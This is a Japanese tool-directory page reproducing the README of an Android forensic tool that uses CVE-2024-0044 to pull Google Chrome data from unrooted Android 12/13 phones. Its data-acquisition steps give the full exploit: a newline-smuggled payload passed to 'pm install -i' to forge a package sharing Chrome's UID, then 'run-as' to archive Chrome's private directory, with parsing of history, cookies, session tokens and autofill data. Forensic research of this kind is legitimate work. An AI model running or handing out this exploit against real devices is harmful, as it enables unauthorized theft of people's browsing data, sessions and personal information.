Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Chrome-Forensic_CVE-2024-0044 — AndroidデバイスからGoogle Chromeのアーティファクトを抽出・解析するための堅牢なデジタルフォレンジックツール | Kitploit
ツール/GitHubGitHub/jacktekno/chrome-forensic_cve-2024-0044
Androidセキュリティ脆弱性分析エクスプロイトフォレンジックモバイルフォレンジックデータ復旧デジタルフォレンジックモバイルセキュリティ学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubjacktekno/chrome-forensic_cve-2024-0044

Chrome-Forensic_CVE-2024-0044

AndroidデバイスからGoogle Chromeのアーティファクトを抽出・解析するための堅牢なデジタルフォレンジックツール

リポジトリを見る
17ヶ月前未レビュー

🔍 Chrome Forensic - CVE-2024-0044

Version Python License Platform

Android端末からGoogle Chromeのアーティファクトを抽出・分析するための堅牢なデジタルフォレンジックツール

機能 • インストール • 使用方法 • ドキュメント


👤 著者情報

著者: JackTekno
GitHub: github.com/JackTekno


📋 概要

このツールは CVE-2024-0044(Run-as)の脆弱性を利用して、root化されていないAndroid 12/13デバイスの権限制限を回避し、Google Chromeデータのフォレンジック抽出を可能にします。このツールは生のSQLiteデータベースを解析し、包括的な分析レポートを生成します。

🔄 処理フロー

Forensic Analysis Flowchart

取得からレポート作成までの完全なフォレンジック分析ワークフロー


📊 機能と出力

このツールは、以下のシートを含む包括的なExcelレポート(result_chrome_forensic.xlsx)を生成します:


🛠️ 前提条件

ハードウェア要件

  • 📱 Androidスマートフォン(Android 12/13)
  • 💻 PC(Linux/Windows/Mac)

テスト済み環境

  • 🐧 OS: Linux UOS 20 Professional

ソフトウェア要件

  • 🐍 Python 3.x
  • 📲 ADB(Android Debug Bridge)
  • 📦 ダミーAPKファイル(例:F-Droid.apk)

🚀 インストール

  1. リポジトリをクローン

    root@kitploit:~
    git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
    cd Chrome-Forensic_CVE-2024-0044
    
  2. 依存関係をインストール

    root@kitploit:~
    pip install -r requirements.txt
    

🔓 データ取得ガイド

ステップ1: デバイスの準備

  1. 設定 → 端末情報 に移動します
  2. ビルド番号 を7回タップして開発者向けオプションを有効にします
  3. 設定 → システム → 開発者向けオプション に移動します
  4. USBデバッグ を有効にします
  5. スマートフォンをUSBでPCに接続し、接続を承認します

ステップ2: エクスプロイトの準備

root@kitploit:~
# Push a dummy APK to temporary folder
adb push F-Droid.apk /data/local/tmp/base.apk

ステップ3: 対象UIDを特定する

root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Output example: package:com.android.chrome uid:10129
# Note the UID (e.g., 10129)

ステップ4: エクスプロイトを実行する

⚠️ 10129 は、ステップ3で確認した実際のChrome UIDに置き換えてください

root@kitploit:~
adb shell

# Inside ADB Shell:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"

# Trigger the package manager
pm install -i "$PAYLOAD" /data/local/tmp/base.apk

ステップ5: データを抽出する

root@kitploit:~
# Still inside ADB Shell
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar

# Exit ADB Shell
exit

ステップ6: データをPCにプルする

root@kitploit:~
adb pull /data/local/tmp/chrome.tar .

ステップ7: データを展開する

プロジェクトフォルダ内で 'chrome.tar' ファイルを展開します。ファイルを手動で移動する必要はありません。Pythonスクリプトが展開されたフォルダ内のデータベースファイルを自動的に見つけ出します。

root@kitploit:~
tar -xf chrome.tar

💻 使用方法

フォレンジック分析ツールを実行します:

root@kitploit:~
python3 chrome_forensic.py

このツールはデータベースファイルを解析し、同じディレクトリに result_chrome_forensic.xlsx を生成します。


⚖️ 法的免責事項

⚠️ 重要: このツールは教育目的および許可されたフォレンジック分析のみを目的として設計されています。

  • 所有しているデバイス、または分析するための明示的な書面による許可を得たデバイスでのみ使用してください
  • デジタルデバイスへの不正アクセスは、お住まいの地域の法律に違反する可能性があります
  • 著者はこのツールの誤用について一切の責任を負いません

🤝 コントリビューション

コントリビューションを歓迎します! お気軽にPull Requestを送ってください。


📄 ライセンス

このプロジェクトはGNU General Public License v3.0の下でライセンスされています。 詳細についてはLICENSEファイルを参照してください。


👤 クレジット

この取得方法の概念実証は、Tinyhack.comによって要約され、共有されました。


JackTeknoが❤️を込めて作成

⭐ このリポジトリにStarを付ける • 🐛 バグを報告 • 💡 機能をリクエスト

ツールをダウンロード
シート名説明
📖 閲覧履歴訪問したURLの詳細なタイムライン
📈 分析 – 上位サイト最も訪問されたドメインの統計ランキング
⚠️ アラート – 不審自動フラグされたURL(ハッキング、薬物、アダルトコンテンツ)
📥 ダウンロードパスとファイルサイズを含むダウンロード履歴
🔍 検索語句オムニボックス/Googleからのユーザー検索クエリ
🍪 CookieとセッションセッショントークンとCookieメタデータ(Hex暗号化)
✍️ オートフィルデータ保存されたフォームデータ(名前、住所など)